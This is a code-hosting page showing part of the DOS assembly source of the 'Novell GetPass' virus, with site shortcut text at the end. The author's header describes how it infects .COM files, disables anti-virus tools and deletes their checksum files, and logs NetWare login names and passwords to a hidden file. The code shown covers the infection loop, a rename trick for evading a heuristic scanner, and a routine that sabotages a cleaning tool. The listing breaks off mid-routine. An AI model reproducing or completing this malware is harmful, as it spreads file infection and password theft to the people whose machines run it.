📄 getpass!.asm
字号:
;=============================================================================
; Please feel free to distribute, but do NOT change and say it's your's!
;=============================================================================
; You are now looking at the source code of the Novell GetPass virus!
; Stop doing so! But if you don't well, ok! The GetPass virus is fairly
; unique in some parts of it's behaviour. It infects *.COM files using
; an infection interrupt routine.(INT D0) It first renames the files
; it infects to a *.TXT file to avoid heuristic alarms of some rule
; based TSR's and then restores the original extention. Some resident
; anti-viral products will be completely disabled in memory and their
; CRC check files will be deleted. The GetPass routine will become
; resident if the virus detects that NETX (Novell NetWare) is loaded
; in memory, hooking INT 16 (keyboard) and INT 21 in memory.
; The GetPass routine activates when LOGIN is executed. The users login
; name and his/her password will be captured and written to a file wich
; will be created in C:\DOS.(the file is MSD.INI) If the file becomes
; approximatly 8Kb, the virus deletes the file. This to avoid a very large
; file in the DOS directory. A new file will be created and the logging
; will continue. Every first day of the month, when an infected program
; is executed the file containing the names/passwords is printed if there
; is a printer available. The virus does not infect COMMAND.COM.
;
; Greetings ,ThE wEiRd GeNiUs
;
; PS: Check your MSD.INI file once in a while!
;-----------------------------------------------------------------------------
; Assemble with TASM 2.0 or higher, Link with TLINK /T
;-----------------------------------------------------------------------------
CODE SEGMENT
ASSUME CS:CODE,DS:CODE,ES:CODE,SS:CODE
CRYPTLEN EQU CHKTIME-CSTART-1;Length to en/decrypt.
VIRLEN EQU BUFFER-VSTART ;Length of virus.
MINLEN EQU 1000 ;Min file length to infect.
MAXLEN EQU 0F230h ;Max " " " "
CR EQU 0Dh ;Return.
LF EQU 0Ah ;Line feed.
TAB EQU 09h ;Tab.
INTRO EQU LBIT-INAME ;
TSRLEN EQU LASTBYT-TSR ;Length of activation TSR.
TSR2LEN EQU NOTENC-INFECT+1;Length of infection Interrupt.
LENGTH EQU VAL_1-CSTART ;Length of encrypted code.
KBUFF EQU KEYBUFF-TSR ;\
KPTR EQU KEYPTR-TSR ;
FN EQU FNAME-TSR ;
LOGINL EQU LOGIN-TSR ;
KFLAG EQU KBFLAG-TSR ; Offsets in activation TSR.
INTOF EQU INT21-TSR ;
INT16L EQU INT16-TSR ;
OLD16L EQU NINT16-TSR ;
NINTOF EQU NINT21-TSR ;
COUCR EQU CCOUNT-TSR ;
PARLEN EQU PARAM-TSR ;/
ORG 0100h
.RADIX 16
;-----------------------------------------------------------------------------
; Infected dummy program. (Only in 1st run)
;-----------------------------------------------------------------------------
START: JMP VSTART ;Jump to virus code.
;-----------------------------------------------------------------------------
; Begin of the virus code.
;-----------------------------------------------------------------------------
VSTART: CALL CHKDOS ;-Confuse anti-viral progs.
CALL CHKTIME ;/
BEGIN: CALL ENCRYP ;Call decryption routine.
;-----------------------------------------------------------------------------
; From here the code will be encrypted.
;-----------------------------------------------------------------------------
CSTART: CALL BEGIN1 ;Same old trick.
CALL RESBEG ;Restore begin.
CALL CHKDRV ;Check drive & DOS version.
CALL SAVEDIR ;Save startup directory.
PUSH ES ;In the next sessions ES is modified.
CALL INT24 ;NoErrorAllowed.
CALL VSAFE ;Vsafe resident?
CALL ACTIVE ;Install password routine.
POP ES ;Restore extra segment.
CALL ENKEY ;Create new CRYPTKEY.
CALL INSTSR2 ;Place infection routine in memory.
CALL DTA ;Store old and give up new DTA addres.
CALL FIND1 ;Determine how many path's are present.
CALL RANDOM ;Random value for directory search.
CALL FIND2 ;Find suitable directory.
CALL CHDRIVE ;If it is on another drive.
CALL GODIR ;Go to the selected directory.
F_FIRST:MOV AH,4Eh ;Search for 1st *.COM
MOV CX,110b ;Look for read only, system & hidden.
LEA DX,[BP+OFFSET SPEC] ;Offset file specification.(*.COM)
INT 21h ;Call DOS.
JNC OPENF ;Exit if no file found.
CALL EXIT1 ;No files found, quit.
OPENF: CALL CHKCOM ;-Is it COMMAND.COM?
CMP CX,00h ;/
JE LETSGO ;Yes, do NOT infect.
CALL CHKINF ;Already infected?
CALL ATTRIB ;Ask & clear file attributes.
CALL RENAME ;Rename to *.TXT file.
MOV AH,4Eh ;Search the name.TXT file.
MOV CX,110b ;Read only, system & hidden.
LEA DX,[BP+OFFSET NEWNAM] ;Offset file specification.(name.TXT)
INT 21h ;Call DOS.
MOV AX,3D02h ;Open file with read and write access.
LEA DX,[BP+OFFSET NEWNAM] ;Offset file specification.(name.TXT)
INT 21h ;Call DOS.
MOV BYTE PTR[BP+OFFSET HANDLE],AL;Save file handle.
CALL STIME ;Save file date & time.
CHECK: MOV AH,3Fh ;Read begin of victim.
MOV CX,3 ;Read Begin.
LEA DX,[BP+OFFSET ORIGNL] ;Into offset original instructions.
INT 21h ;Call DOS.
JC CLOSE ;On error, quit.
REPLACE:CALL BPOINT ;Move file pointer to end of victim.
SUB AX,3 ;Calculate new jump.
MOV WORD PTR[BP+NEWJMP+1],AX;Store new jump value.
MOV AX,4200h ;Move file pointer to begin.
XOR CX,CX ;Zero high nybble.
XOR DX,DX ;Zero low nybble.
INT 21h ;Call DOS.
MOV AH,40h ;Write to file,
MOV CX,3 ;3 Bytes.
LEA DX,[BP+OFFSET NEWJMP] ;Offset new jump value.
INT 21h ;Call DOS.
CALL BPOINT ;Move file pointer to end.
JMP INFEC ;Create encryption key.
LETSGO: MOV AH,4Fh ;Find next.
INT 21h ;Call DOS.
JC EXIT ;On error, quit.
JMP OPENF ;Open new victim.
INFEC: MOV DL,[BP+OFFSET VAL_1] ;Encryption value into DL.
INT 0D0h ;Neat way to infect a file!
CLOSE: CALL RTIME ;Restore File time & date.
MOV AH,3Eh ;Close file.
INT 21h ;Call DOS.
CALL RENAME2 ;Restore back to COM file.
CALL RATTRIB ;Restore File attributes.
;-----------------------------------------------------------------------------
EXIT: CALL DELSTUF ;Delete CRC checkers.
EXIT1: MOV AH,1Ah ;Restore old DTA.
MOV DX,[BP+OFFSET OLD_DTA] ;Old DTA address.
INT 21h ;Call DOS.
EXIT2: MOV AH,0Eh ;Restore startup drive.
MOV DL,BYTE PTR[BP+OFFSET OLDRV];Old drive code.
INT 21h ;Call DOS.
MOV AH,3Bh ;Goto startup directory,
LEA DX,[BP+OFFSET BUFFER] ;that is stored here.
INT 21h ;Call DOS.
EXIT3: CALL RINT24 ;Restore original INT 24
EXIT4: MOV AX,100h ;
PUSH AX ;
RET ;Pass control to HOST.
;-----------------------------------------------------------------------------
DUMEX: MOV DI,0100h ;This is a dummy exit, it screws up
LEA SI,[BP+DEXIT] ;TbClean. In stead of cleaning the
MOV CX,3 ;phile, it puts a program terminating
REPNZ MOVSB ;interrupt in the beginning of the
MOV AX,0100h ;victim, neat huh!
PUSH AX ;
RET ;
;-----------------------------------------------------------------------------
BETWEEN:MOV AH,3Eh ;Close the file.
INT 21h ;Call DOS
JMP LETSGO ;Find next file.
CHKINF: MOV AX,3D00h ;Open file with only read acces.
MOV DX,WORD PTR[BP+OFFSET NP];Offset filename.
INT 21h ;Call DOS.
MOV BX,AX ;File handle into BX.
MOV CX,0FFFFh ;- Move -3 into CX,DX.
MOV DX,0FFFCh ;/
MOV AX,4202h ;Move file pointer to end-3
INT 21h ;Call DOS.
MOV AH,3Fh ;Read file.
MOV CX,01h ;One Byte.
LEA DX,[BP+OFFSET MARK1] ;Into this address.
INT 21h ;Call DOS.
CMP BYTE PTR [BP+OFFSET MARK1],43h; Is it infected?
JE BETWEEN ;Yes, find another.
CALL BPOINT ;Go to EOF.
CMP AX,MAXLEN ;Is the file to long?
JNB BETWEEN ;Yes, find another.
CMP AX,MINLEN ;Is it to short?
JBE BETWEEN ;Yes, find another.
MOV AH,3Eh ;Close the file.
INT 21h ;Call DOS
RET ;Return to caller.
;-----------------------------------------------------------------------------
CHKDRV: CALL CHKDOS ;Check DOS version.
CMP AL,01 ;
JB DUMEX ;Screw up TbClean.
CMP AL,05h ;Is it DOS 5.0 or higher?
JNGE EXIT4 ;No, exit.
MOV AH,19h ;Get drive code.
INT 21h ;Call DOS.
MOV BYTE PTR[BP+OFFSET OLDRV],AL;Save old drive code.
RET ;Return to caller.
;-----------------------------------------------------------------------------
RESBEG: LEA SI,[BP+OFFSET ORIGNL] ;Offset original begin.
MOV DI,0100h ;Restore original instructions.
MOV CX,3 ;Restore 3 bytes.
REPNZ MOVSB ;Move them.
RET ;Return to caller.
;-----------------------------------------------------------------------------
CHKCOM: MOV CX,05 ;CX=len COMMAND.
MOV DI,[BP+OFFSET NP] ;Offset found file.
LEA SI,[BP+OFFSET COMMND] ;Offset COMMAND.
REPZ CMPSB ;Compare the strings.
RET ;Return to caller.
;-----------------------------------------------------------------------------
RENAME: MOV CX,0Ch ; This section renames the
MOV SI,WORD PTR[BP+OFFSET NP]; found and approved for
LEA DI,WORD PTR[BP+OFFSET NEWNAM]; infection file to a
REPNZ MOVSB ; *.TXT file. The reason for
LEA BX,WORD PTR[BP+OFFSET NEWNAM-1];this is that VPROTECT from
LPOINT: INC BX ; Intel has a rule based NLM.
CMP BYTE PTR[BX],'.' ; If we write to a COM file
JNE LPOINT ; VPROTECT gives an alarm
MOV DI,BX ; message. However, if we
MOV WORD PTR[BP+OFFSET TXTPOI],BX; write to a text file....
LEA SI,[BP+OFFSET TXT] ; Pretty solution isn't it?
MOVSW ;
MOVSW ;
MOV DX,WORD PTR[BP+OFFSET NP];
LEA DI,WORD PTR[BP+OFFSET NEWNAM];
MOV AH,56h ;Rename file function.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
RENAME2:LEA SI,[BP+OFFSET SPEC+1] ; In this section we
MOV DI,WORD PTR[BP+OFFSET TXTPOI]; give the infected file
MOVSW ; its old extention back.
MOVSW ; (*.COM)
MOV DX,WORD PTR[BP+OFFSET NP];
LEA DI,WORD PTR[BP+OFFSET NEWNAM];
MOV AH,56h ;Rename file function.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
ENKEY: CALL CHKTIME ;Get time.
MOV BYTE PTR[BP+OFFSET VAL_1],DL;New encryption key.
RET ;Return to caller.
;-----------------------------------------------------------------------------
SAVEDIR:MOV BYTE PTR[BP+OFFSET BUFFER],5Ch;Put a slash in DTA.
MOV DL,BYTE PTR[BP+OFFSET OLDRV];Drive code.
INC DL ;DL+1 because functions differ.
MOV AH,47h ;Get current directory.
LEA SI,[BP+OFFSET BUFFER+1] ;Store current directory.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
DTA: MOV AH,2Fh ;Get DTA address.
INT 21h ;Call DOS.
MOV WORD PTR[BP+OFFSET OLD_DTA],BX; Save here.
LEA DX,[BP+OFFSET NEW_DTA] ;Offset new DTA address.
MOV AH,1Ah ;Give up new DTA.
INT 21 ;Call DOS.
ADD DX,1Eh ;Filename pointer in DTA.
MOV WORD PTR[BP+OFFSET NP],DX;Put in name pointer.
RET ;Return to caller.
;-----------------------------------------------------------------------------
INT24: MOV AX,3524h ;Get int 24 handler.
INT 21h ;into [ES:BX].
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -